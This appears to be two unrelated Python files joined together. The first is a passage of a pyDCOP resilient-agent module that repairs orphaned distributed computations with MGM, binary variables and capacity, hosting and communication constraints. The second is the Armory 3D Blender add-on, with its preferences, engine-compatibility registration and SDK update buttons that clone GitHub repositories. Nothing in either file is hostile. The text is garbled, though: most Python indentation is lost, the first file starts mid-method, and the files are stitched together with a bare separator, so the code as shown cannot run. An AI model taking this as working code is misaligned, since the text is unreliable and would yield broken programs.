# * capacity constraint : one for this agent
# * hosting costs constraint : one for this agent
# * communication constraint
#
        # For reparation, we use a dcop algorithm where computations map to
# variables of the dcop. On this agent, we host the computations
# corresponding to the variables representing the orphaned computation
# that could be hosted on this agent (aka candidate computation).
# Here, we use MGM
own_name = self.name
# `orphaned_binvars` is a map that contains binary variables for
# orphaned computations.
# Notice that it only contains variables for computations
# that this agents knows of, i.e. computations that could be hosted
# here (aka candidate computations) or that depends on computations
# that could be hosted here.
# There is one binary variable x_i^m for each pair (x_i, a_m),
# where x_i is an orphaned computation and a_m is an agent that could
# host x_i (i.e. has a replica of x_i).
orphaned_binvars = {} # type: Dict[Tuple, BinaryVariable]
# One binary variable x_i^m for each candidate computation x_i that
# could be hosted on this agent a_m. Computation for these variables
# will be hosted in this agent. This is a subset of orphaned_binvars.
candidate_binvars = {} # type: Dict[Tuple, BinaryVariable]
# Agent that will host the computation for each binary var.
# it is a dict { bin var name : agent_name }
# agt_hosting_binvar = {} # type: Dict[str, str]
# `hosted_cs` contains hard constraints ensuring that all candidate
# computations are hosted:
hosted_cs = {} # type: Dict[str, Constraint]
for candidate_comp, candidate_info in repair_info.items():
try:
                # This computation is not hosted any more; if we had it in
                # discovery, forget about it, but do not publish this
                # information: this agent is not responsible for updating
                # others' discovery services.
self.discovery.unregister_computation(candidate_comp,
publish=False)
except UnknownComputation:
pass
agts, _, neighbors = candidate_info
# One binary variable for each candidate agent for computation
# candidate_comp:
v_binvar = create_binary_variables(
'B', ([candidate_comp], candidate_info[0]))
# Set initial values for binary decision variable
for v in v_binvar.values():
v._intial_value = 1 if random.random() < 1/3 else 0
orphaned_binvars.update(v_binvar)
# the variable representing if the computation will be hosted on
# this agent:
candidate_binvars[(candidate_comp, own_name)] = \
v_binvar[(candidate_comp, own_name)]
# the 'hosted' hard constraint for this candidate variable:
hosted_cs[candidate_comp] =\
create_computation_hosted_constraint(candidate_comp, v_binvar)
self.logger.debug('Hosted hard constraint for computation %s : %r',
candidate_comp, hosted_cs[candidate_comp])
# One binary variable for each pair (x_j, a_n) where x_j is an
            # orphaned neighbor of candidate_comp and a_n is an agent that
            # could host x_j:
for neighbor in neighbors:
v_binvar = create_binary_variables(
'B', ([neighbor], neighbors[neighbor]))
orphaned_binvars.update(v_binvar)
self.logger.debug('Binary variable for reparation %s ',
orphaned_binvars)
# Agent that will host the computation for each binary var.
# it is a dict { bin var name : agent_name }
agt_hosting_binvar = {v.name: a
for (_, a), v in orphaned_binvars.items()}
self.logger.debug('Agents hosting the computations for these binary '
'variables : %s ', agt_hosting_binvar)
# The capacity (hard) constraint for this agent. This ensures that the
# capacity of the current agent will not be overflown by hosting too
# many candidate computations. This constraints depends on the binary
# variables for the candidate computations.
remaining_capacity = self.agent_def.capacity - \
sum(c.footprint() for c in self.computations())
self.logger.debug('Remaining capacity on agent %s : %s',
self.name, remaining_capacity)
def footprint_func(c_name: str):
# We have a replica for these computation, we known its footprint.
return self.replication_comp.hosted_replicas[c_name][1]
capacity_c = create_agent_capacity_constraint(
own_name, remaining_capacity, footprint_func,
candidate_binvars)
self.logger.debug('Capacity constraint for agt %s : %r',
self.name, capacity_c)
# Hosting costs constraint for this agent. This soft constraint is
# used to minimize the hosting costs on this agent ; it depends on
# the binary variables for the candidate computations.
hosting_c = create_agent_hosting_constraint(
own_name, self.agent_def.hosting_cost,
candidate_binvars)
self.logger.debug('Hosting cost constraint for agt %s : %r',
self.name, hosting_c)
        # The communication constraint. This soft constraint is used to
        # minimize the communication cost on this agent. As communication
        # cost depends on where the computations on both sides of an edge are
# hosted, it also depends on the binary variables for orphaned
# computations that could not be hosted here.
def comm_func(candidate_comp: str, neighbor_comp: str, agt: str):
# returns the communication cost between the computation
            # candidate_comp hosted on the current agent and its neighbor
            # computation neighbor_comp hosted on agt.
route_cost = self.agent_def.route(agt)
comp_def = self.replication_comp.replicas[candidate_comp]
algo = comp_def.algo.algo
algo_module = load_algorithm_module(algo)
communication_load = algo_module.communication_load
msg_load = 0
for l in comp_def.node.neighbors:
if l == neighbor_comp:
msg_load += communication_load(comp_def.node, neighbor_comp)
com_load = msg_load * route_cost
return com_load
# Now that we have the variables and constraints, we can create
# computation instances for each of the variable this agent is
# responsible for, i.e. the binary variables x_i^m that correspond to
# the candidate variable x_i (and a_m is the current agent)
self._repair_computations.clear()
algo_def = AlgorithmDef.build_with_default_param(
repair_algo.algorithm_name,
{'stop_cycle': 20, 'threshold': 0.2},
mode='min',
parameters_definitions=repair_algo.algo_params)
for (comp, agt), candidate_var in candidate_binvars.items():
self.logger.debug('Building computation for binary variable %s ('
'variable %s on %s)', candidate_var, comp, agt)
comm_c = create_agent_comp_comm_constraint(
agt, comp, repair_info[comp], comm_func, orphaned_binvars)
self.logger.debug('Communication constraint for computation %s '
'on agt %s : %r', comp, self.name, comm_c)
constraints = [comm_c, hosting_c, capacity_c, hosted_cs[comp]]
# constraints.extend(hosted_cs.values())
self.logger.debug('Got %s Constraints for var %s : %s ',
len(constraints), candidate_var, constraints)
node = chg.VariableComputationNode(candidate_var, constraints)
comp_def = ComputationDef(node, algo_def)
computation = repair_algo.build_computation(comp_def)
self.logger.debug('Computation for %s : %r ',
candidate_var, computation)
# add the computation on this agents and register the neighbors
self.add_computation(computation, publish=True)
self._repair_computations[computation.name] = \
RepairComputationRegistration(computation, 'ready', comp)
for neighbor_comp in node.neighbors:
neighbor_agt = agt_hosting_binvar[neighbor_comp]
try:
self.discovery.register_computation(
neighbor_comp, neighbor_agt,
publish=False)
except UnknownAgent:
# If we don't know this agent yet, we must perform a lookup
# and only register the computation once found.
# Note the use of partial, to force the capture of
# neighbor_comp.
def _agt_lookup_done(comp, evt, evt_agt, _):
if evt == 'agent_added':
self.discovery.register_computation(
comp, evt_agt, publish=False)
self.discovery.subscribe_agent(
neighbor_agt,
partial(_agt_lookup_done, neighbor_comp),
one_shot=True)
        self.logger.info('Repair setup done on %s, %s computations created, '
'inform orchestrator', self.name,
len(candidate_binvars))
return candidate_binvars
def repair_run(self):
self.logger.info('Agent runs Repair dcop computations')
comps = list(self._repair_computations.values())
for c in comps:
c.computation.start()
c.status = 'started'
def _on_replication_done(self, replica_hosts: Dict[str, List[str]]):
"""
Called when all computations have been replicated.
        This method is meant to be overwritten in subclasses.
Parameters
----------
replica_hosts: a map { computation name -> List of agt name }
For each active computation hosted by this agent, this map
contains a list of agents that have been selected to host a
replica.
"""
self.logger.info('Replica distribution finished for agent '
'%s : %s (level requested : %s)', self.name,
replica_hosts, self._replication_level)
rep_levels = {computation: len(replica_hosts[computation])
for computation in replica_hosts}
if not all([level >= self._replication_level
for level in rep_levels.values()]):
self.logger.warning('Insufficient replication for computations: '
'%s ',
rep_levels)
def _on_computation_finished(self, computation: str,
*args, **kwargs):
self.logger.debug('Computation %s has finished', computation)
if self.replication_comp and computation in self._repair_computations:
self._on_repair_computation_finished(computation)
def _on_repair_computation_finished(self, computation: str):
repair_comp = self._repair_computations[computation]
repair_comp.status = 'finished'
# deploy the computation if it was selected during reparation:
if repair_comp.computation.current_value == 1:
self.logger.info('Reparation: computation %s selected on %s',
repair_comp.candidate, self.name)
comp_def = self.replication_comp.replicas[repair_comp.candidate]
self.logger.info('Deploying computation %s locally with '
'definition , %r', repair_comp.candidate,
comp_def)
comp = build_computation(comp_def)
self.add_computation(comp, publish=True)
else:
self.logger.info('Reparation: computation %s NOT selected on '
'%s', repair_comp.candidate, self.name)
# Remove replica: it will be re-replicated by its new host.
self.replication_comp.remove_replica(repair_comp.candidate)
if all(c.status == 'finished'
for c in self._repair_computations.values()):
selected_computations = \
[c.candidate for c in self._repair_computations.values()
if c.computation.current_value == 1]
self.logger.info('All repair computations have finished, '
'selected computation : %s',
selected_computations)
metrics = self.metrics()
print(f" metrics repair {self.name} - {metrics}")
repair_metrics = {'count_ext_msg' : {}, 'size_ext_msg': {} , 'cycles' :{}}
for c in self._repair_computations.values():
c_name = c.computation.name
if c_name in metrics['count_ext_msg']:
repair_metrics['count_ext_msg'][c_name] = metrics['count_ext_msg'][c_name]
else:
repair_metrics['count_ext_msg'][c_name] = 0
if c_name in metrics['size_ext_msg']:
repair_metrics['size_ext_msg'][c_name] = metrics['size_ext_msg'][c_name]
else:
repair_metrics['size_ext_msg'][c_name] = 0
if c_name in metrics['cycles']:
repair_metrics['cycles'][c_name] = metrics['cycles'][c_name]
else:
repair_metrics['cycles'][c_name] = 0
print(f" {self.name} : metrics after repair {repair_metrics}")
self._on_repair_done(selected_computations, repair_metrics)
if selected_computations:
self.logger.info('Re-replicate newly activated computations '
'on %s : %s , level %s', self.name,
selected_computations,
self._replication_level)
try:
self.replication_comp.replicate(self._replication_level,
selected_computations)
except UnknownComputation:
# avoid crashing if one of the neighbor comp is not repaired yet
pass
self.logger.info('Starting newly activated computations on '
'%s : %s ', self.name,
selected_computations)
for selected in selected_computations:
self.computation(selected).start()
self.computation(selected).pause()
# Remove / undeploy repair comp once repaired
for repair_comp in self._repair_computations.values():
self.remove_computation(repair_comp.computation.name)
self._repair_computations.clear()
    def _on_repair_done(self, selected_computations: List[str], repair_metrics: Dict):
"""
Called when all repair computations have finished.
        This method is meant to be overwritten in subclasses.
"""
pass
class RepairComputation(MessagePassingComputation):
"""
"""
def __init__(self, agent: ResilientAgent):
        super().__init__('_resilience_' + agent.name)
self.agent = agent
self.logger = logging.getLogger('pydcop.agent.repair.'+agent.name)
self._handlers = {
#'replication': self._on_replication,
# 'setup_repair': self._on_setup_repair,
# 'repair_run': self._on_repair_run,
}
@property
def type(self):
return 'replication'
def on_message(self, var_name, msg, t):
self._handlers[msg.type](msg)
def footprint(self):
return 0
def replication_done(self, replica_hosts: Dict[str, List[str]]):
"""
Called when all computations have been replicated.
The replication algorithm only selects agents to host replicas,
here we send the actual computations definitions to the agents
selected to host a replica.
We also send the obtained replication to the orchestrator.
Parameters
----------
replica_hosts: a map { computation name -> List of agt name }
For each active computation hosted by this agent, this map
contains a list of agents that have been selected to host a
replica.
"""
self.logger.info('Replica distribution finished for agent '
'%s : %s', self.name, replica_hosts)
# self.agent.on_replication_done()
# dist_msg = ComputationReplicatedMessage(self.name, replica_hosts)
# self.message_sender.post_send_to_orchestrator(dist_msg)
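# Illustrative (hypothetical) shape of the replica_hosts argument documented
# above: each active local computation maps to the agents selected to host
# its replicas, e.g. {'c1': ['a2', 'a3', 'a5'], 'c2': ['a3', 'a4', 'a5']}.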
|
armory.py
|
# Armory 3D Engine
# https://github.com/armory3d/armory
bl_info = {
"name": "Armory",
"category": "Render",
"location": "Properties -> Render -> Armory",
"description": "3D Game Engine for Blender",
"author": "Armory3D.org",
"version": (0, 6, 0),
"blender": (2, 80, 0),
"wiki_url": "http://armory3d.org/manual",
"tracker_url": "https://github.com/armory3d/armory/issues"
}
import os
import sys
import stat
import shutil
import webbrowser
import subprocess
import threading
import bpy
import platform
from bpy.types import Operator, AddonPreferences
from bpy.props import *
from bpy.app.handlers import persistent
def get_os():
s = platform.system()
if s == 'Windows':
return 'win'
elif s == 'Darwin':
return 'mac'
else:
return 'linux'
class ArmoryAddonPreferences(AddonPreferences):
bl_idname = __name__
def sdk_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.sdk_path = bpy.path.reduce_dirs([bpy.path.abspath(self.sdk_path)])[0] + '/'
def ffmpeg_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.ffmpeg_path = bpy.path.reduce_dirs([bpy.path.abspath(self.ffmpeg_path)])[0]
def renderdoc_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.renderdoc_path = bpy.path.reduce_dirs([bpy.path.abspath(self.renderdoc_path)])[0]
sdk_bundled = BoolProperty(name="Bundled SDK", default=True)
sdk_path = StringProperty(name="SDK Path", subtype="FILE_PATH", update=sdk_path_update, default="")
show_advanced = BoolProperty(name="Show Advanced", default=False)
player_gapi_win = EnumProperty(
items = [('opengl', 'Auto', 'opengl'),
('opengl', 'OpenGL', 'opengl'),
('direct3d11', 'Direct3D11', 'direct3d11')],
name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
player_gapi_linux = EnumProperty(
items = [('opengl', 'Auto', 'opengl'),
('opengl', 'OpenGL', 'opengl')],
name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
player_gapi_mac = EnumProperty(
items = [('opengl', 'Auto', 'opengl'),
('opengl', 'OpenGL', 'opengl')],
name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
code_editor = EnumProperty(
items = [('kodestudio', 'Kode Studio', 'kodestudio'),
('default', 'System Default', 'default')],
name="Code Editor", default='kodestudio', description='Use this editor for editing scripts')
ui_scale = FloatProperty(name='UI Scale', description='Adjust UI scale for Armory tools', default=1.0, min=1.0, max=4.0)
khamake_threads = IntProperty(name='Khamake Threads', description='Allow Khamake to spawn multiple processes for faster builds', default=4, min=1)
renderdoc_path = StringProperty(name="RenderDoc Path", description="Binary path", subtype="FILE_PATH", update=renderdoc_path_update, default="")
ffmpeg_path = StringProperty(name="FFMPEG Path", description="Binary path", subtype="FILE_PATH", update=ffmpeg_path_update, default="")
save_on_build = BoolProperty(name="Save on Build", description="Save .blend", default=False)
legacy_shaders = BoolProperty(name="Legacy Shaders", description="Attempt to compile shaders runnable on older hardware", default=False)
relative_paths = BoolProperty(name="Generate Relative Paths", description="Write relative paths in khafile", default=False)
viewport_controls = EnumProperty(
items=[('qwerty', 'qwerty', 'qwerty'),
('azerty', 'azerty', 'azerty')],
name="Viewport Controls", default='qwerty', description='Viewport camera mode controls')
skip_update = BoolProperty(name="", default=False)
def draw(self, context):
self.skip_update = False
layout = self.layout
layout.label(text="Welcome to Armory! Click 'Save User Settings' at the bottom to keep Armory enabled.")
p = bundled_sdk_path()
if os.path.exists(p):
layout.prop(self, "sdk_bundled")
if not self.sdk_bundled:
layout.prop(self, "sdk_path")
else:
layout.prop(self, "sdk_path")
box = layout.box().column()
box.label(text="Armory Updater")
box.label(text="Note: Development version may run unstable!")
row = box.row(align=True)
row.alignment = 'EXPAND'
row.operator("arm_addon.install_git", icon="URL")
row.operator("arm_addon.update", icon="FILE_REFRESH")
row.operator("arm_addon.restore")
box.label(text="Please restart Blender after successful SDK update.")
layout.prop(self, "show_advanced")
if self.show_advanced:
box = layout.box().column()
box.prop(self, "player_gapi_" + get_os())
box.prop(self, "code_editor")
# box.prop(self, "kha_version")
box.prop(self, "renderdoc_path")
box.prop(self, "ffmpeg_path")
box.prop(self, "viewport_controls")
box.prop(self, "ui_scale")
box.prop(self, "khamake_threads")
box.prop(self, "save_on_build")
box.prop(self, "legacy_shaders")
box.prop(self, "relative_paths")
def bundled_sdk_path():
if get_os() == 'mac':
# SDK on MacOS is located in .app folder due to security
p = bpy.app.binary_path
if p.endswith('Contents/MacOS/blender'):
return p[:-len('Contents/MacOS/blender')] + '/armsdk/'
else:
return p[:-len('Contents/MacOS/./blender')] + '/armsdk/'
elif get_os() == 'linux':
# /blender
return bpy.app.binary_path.rsplit('/', 1)[0] + '/armsdk/'
else:
# /blender.exe
return bpy.app.binary_path.replace('\\', '/').rsplit('/', 1)[0] + '/armsdk/'
def get_fp():
if bpy.data.filepath == '':
return ''
s = bpy.data.filepath.split(os.path.sep)
s.pop()
return os.path.sep.join(s)
def get_sdk_path(context):
user_preferences = context.user_preferences
addon_prefs = user_preferences.addons["armory"].preferences
p = bundled_sdk_path()
if os.path.exists(get_fp() + '/armsdk'):
return get_fp() + '/armsdk'
elif os.path.exists(p) and addon_prefs.sdk_bundled:
return p
else:
return addon_prefs.sdk_path
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
def update_repo(done, p, n, gitn = ''):
if gitn == '':
gitn = n
if not os.path.exists(p + '/' + n + '_backup'):
os.rename(p + '/' + n, p + '/' + n + '_backup')
if os.path.exists(p + '/' + n):
shutil.rmtree(p + '/' + n, onerror=remove_readonly)
run_proc(['git', 'clone', 'https://github.com/armory3d/' + gitn, p + '/' + n, '--depth=1'], done)
def restore_repo(p, n):
if os.path.exists(p + '/' + n + '_backup'):
if os.path.exists(p + '/' + n):
shutil.rmtree(p + '/' + n, onerror=remove_readonly)
os.rename(p + '/' + n + '_backup', p + '/' + n)
class ArmAddonStartButton(bpy.types.Operator):
'''Start Armory integration'''
bl_idname = "arm_addon.start"
bl_label = "Start"
running = False
def execute(self, context):
if bpy.app.version >= (2, 80, 1):
from bl_ui import properties_render
# properties_render.RENDER_PT_render.COMPAT_ENGINES.add('ARMORY')
# properties_render.RENDER_PT_output.COMPAT_ENGINES.add('ARMORY')
properties_render.RENDER_PT_dimensions.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_world
properties_world.WORLD_PT_context_world.COMPAT_ENGINES.add('ARMORY')
properties_world.WORLD_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
properties_world.EEVEE_WORLD_PT_surface.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_material
properties_material.MATERIAL_PT_preview.COMPAT_ENGINES.add('ARMORY')
properties_material.MATERIAL_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
properties_material.EEVEE_MATERIAL_PT_context_material.COMPAT_ENGINES.add('ARMORY')
properties_material.EEVEE_MATERIAL_PT_surface.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_object
properties_object.OBJECT_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_particle
properties_particle.PARTICLE_MT_specials.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_context_particles.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_emission.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_hair_dynamics.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_cache.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_velocity.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_rotation.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_physics.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_boidbrain.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_render.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_draw.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_children.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_field_weights.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_force_fields.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_vertexgroups.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_textures.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_scene
properties_scene.SCENE_PT_scene.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_unit.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_color_management.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_audio.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_physics.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_rigid_body_world.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_rigid_body_cache.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_rigid_body_field_weights.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_texture
properties_texture.TEXTURE_MT_specials.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_preview.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_context.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_node.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_node_mapping.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_colors.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_clouds.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_wood.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_marble.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_magic.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_blend.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_stucci.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_image.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_image_sampling.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_image_mapping.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_musgrave.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_voronoi.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_distortednoise.COMPAT_ENGINES.add('ARMORY')
properties_texture.TextureSlotPanel.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_mapping.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_influence.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_armature
properties_data_armature.DATA_PT_custom_props_arm.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_bone
properties_data_bone.BONE_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_camera
properties_data_camera.DATA_PT_context_camera.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_lens.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_camera_stereoscopy.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_camera_dof.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_camera_background_image.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_camera_display.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_camera_safe_areas.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_custom_props_camera.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_custom_props_camera.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_curve
properties_data_curve.DATA_PT_curve_texture_space.COMPAT_ENGINES.add('ARMORY')
properties_data_curve.DATA_PT_custom_props_curve.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_light
properties_data_light.DATA_PT_context_light.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_preview.COMPAT_ENGINES.add('ARMORY')
# properties_data_light.DATA_PT_light.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_EEVEE_light.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_EEVEE_shadow.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_area.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_spot.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_falloff_curve.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_custom_props_light.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_lattice
properties_data_lattice.DATA_PT_custom_props_lattice.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_lightprobe
properties_data_lightprobe.DATA_PT_context_lightprobe.COMPAT_ENGINES.add('ARMORY')
properties_data_lightprobe.DATA_PT_lightprobe.COMPAT_ENGINES.add('ARMORY')
properties_data_lightprobe.DATA_PT_lightprobe_parallax.COMPAT_ENGINES.add('ARMORY')
properties_data_lightprobe.DATA_PT_lightprobe_display.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_mesh
properties_data_mesh.DATA_PT_context_mesh.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_normals.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_texture_space.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_vertex_groups.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_face_maps.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_shape_keys.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_uv_texture.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_vertex_colors.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_customdata.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_custom_props_mesh.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_metaball
properties_data_metaball.DATA_PT_mball_texture_space.COMPAT_ENGINES.add('ARMORY')
properties_data_metaball.DATA_PT_custom_props_metaball.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_speaker
properties_data_speaker.DATA_PT_context_speaker.COMPAT_ENGINES.add('ARMORY')
properties_data_speaker.DATA_PT_speaker.COMPAT_ENGINES.add('ARMORY')
properties_data_speaker.DATA_PT_distance.COMPAT_ENGINES.add('ARMORY')
properties_data_speaker.DATA_PT_cone.COMPAT_ENGINES.add('ARMORY')
properties_data_speaker.DATA_PT_custom_props_speaker.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_physics_cloth
properties_physics_cloth.PHYSICS_PT_cloth.COMPAT_ENGINES.add('ARMORY')
properties_physics_cloth.PHYSICS_PT_cloth_cache.COMPAT_ENGINES.add('ARMORY')
properties_physics_cloth.PHYSICS_PT_cloth_collision.COMPAT_ENGINES.add('ARMORY')
properties_physics_cloth.PHYSICS_PT_cloth_stiffness.COMPAT_ENGINES.add('ARMORY')
properties_physics_cloth.PHYSICS_PT_cloth_sewing.COMPAT_ENGINES.add('ARMORY')
properties_physics_cloth.PHYSICS_PT_cloth_field_weights.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_physics_common
properties_physics_common.PHYSICS_PT_add.COMPAT_ENGINES.add('ARMORY')
properties_physics_common.PHYSICS_PT_add.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_physics_softbody
properties_physics_softbody.PHYSICS_PT_softbody.COMPAT_ENGINES.add('ARMORY')
properties_physics_softbody.PHYSICS_PT_softbody_cache.COMPAT_ENGINES.add('ARMORY')
properties_physics_softbody.PHYSICS_PT_softbody_goal.COMPAT_ENGINES.add('ARMORY')
properties_physics_softbody.PHYSICS_PT_softbody_edge.COMPAT_ENGINES.add('ARMORY')
properties_physics_softbody.PHYSICS_PT_softbody_collision.COMPAT_ENGINES.add('ARMORY')
properties_physics_softbody.PHYSICS_PT_softbody_solver.COMPAT_ENGINES.add('ARMORY')
properties_physics_softbody.PHYSICS_PT_softbody_field_weights.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_physics_rigidbody
properties_physics_rigidbody.PHYSICS_PT_rigid_body.COMPAT_ENGINES.add('ARMORY')
properties_physics_rigidbody.PHYSICS_PT_rigid_body_collisions.COMPAT_ENGINES.add('ARMORY')
properties_physics_rigidbody.PHYSICS_PT_rigid_body_dynamics.COMPAT_ENGINES.add('ARMORY')
properties_physics_rigidbody.PHYSICS_PT_rigid_body_dynamics.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_physics_rigidbody_constraint
properties_physics_rigidbody_constraint.PHYSICS_PT_rigid_body_constraint.COMPAT_ENGINES.add('ARMORY')
sdk_path = get_sdk_path(context)
if sdk_path == "":
print("Configure Armory SDK path first")
return {"CANCELLED"}
scripts_path = sdk_path + "/armory/blender/"
sys.path.append(scripts_path)
local_sdk = os.path.exists(get_fp() + '/armsdk')
import start
start.register(local_sdk=local_sdk)
ArmAddonStartButton.running = True
return {"FINISHED"}
class ArmAddonStopButton(bpy.types.Operator):
'''Stop Armory integration'''
bl_idname = "arm_addon.stop"
bl_label = "Stop"
def execute(self, context):
import start
start.unregister()
ArmAddonStartButton.running = False
return {"FINISHED"}
class ArmAddonUpdateButton(bpy.types.Operator):
'''Update Armory SDK'''
bl_idname = "arm_addon.update"
bl_label = "Update SDK"
bl_description = "Update to the latest development version"
def execute(self, context):
p = get_sdk_path(context)
if p == "":
self.report({"ERROR"}, "Configure Armory SDK path first")
return {"CANCELLED"}
self.report({'INFO'}, 'Updating, check console for details. Please restart Blender after successful SDK update.')
print('Armory (add-on v' + str(bl_info['version']) + '): Cloning [armory, iron, haxebullet, haxerecast, zui] repositories')
os.chdir(p)
global repos_updated
global repos_total
repos_updated = 0
repos_total = 7
def done():
global repos_updated
global repos_total
repos_updated += 1
if repos_updated == repos_total:
print('Armory SDK updated, please restart Blender')
update_repo(done, p, 'armory')
update_repo(done, p, 'iron')
update_repo(done, p, 'lib/haxebullet', 'haxebullet')
update_repo(done, p, 'lib/haxerecast', 'haxerecast')
update_repo(done, p, 'lib/zui', 'zui')
update_repo(done, p, 'lib/armory_tools', 'armory_tools')
update_repo(done, p, 'lib/iron_format', 'iron_format')
# update_repo(done, p, 'Kha', recursive=True)
# update_repo(done, p, 'Krom', 'Krom_bin')
return {"FINISHED"}
class ArmAddonRestoreButton(bpy.types.Operator):
'''Restore Armory SDK'''
bl_idname = "arm_addon.restore"
bl_label = "Restore SDK"
bl_description = "Restore stable version"
def execute(self, context):
p = get_sdk_path(context)
if p == "":
self.report({"ERROR"}, "Configure Armory SDK path first")
return {"CANCELLED"}
os.chdir(p)
restore_repo(p, 'armory')
restore_repo(p, 'iron')
